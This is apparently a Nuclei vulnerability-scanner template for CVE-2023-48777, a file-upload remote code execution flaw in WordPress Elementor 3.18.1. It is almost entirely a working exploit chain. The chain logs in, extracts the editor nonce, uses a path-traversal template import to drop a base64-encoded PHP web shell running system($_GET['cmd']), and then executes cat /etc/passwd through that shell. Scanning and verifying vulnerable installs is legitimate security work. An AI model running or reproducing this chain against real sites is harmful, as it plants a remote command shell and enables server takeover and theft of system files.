id: CVE-2023-48777 info: name: WordPress Elementor 3.18.1 - File Upload/Remote Code Execution author: DhiyaneshDK severity: critical description: | The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server. remediation: Fixed in 3.18.2 reference: - https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9/ metadata: verified: true max-request: 4 framework: wordpress publicwww-query: "/wp-content/plugins/elementor/" tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated variables: filename: "{{rand_base(6)}}" payload: '{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}' http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded actions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax - | GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "regex('root:.*:0:0:', body_4)" - "status_code_4 == 200" condition: and extractors: - type: regex internal: true name: nonce part: body group: 1 regex: - 'admin\\\/admin\-ajax\.php","nonce":"([0-9a-z]+)"' # digest: 4b0a00483046022100b71e9b31dece4dcf31fbd4629f0aea2339c0ec8922cf20066400a2d2232bca0c02210091ea465a635a3c4c909c86e44122140e35c0f0fc6fb70e2e4182abe48c32c568:922c64590222798bb761d5b6d8e72950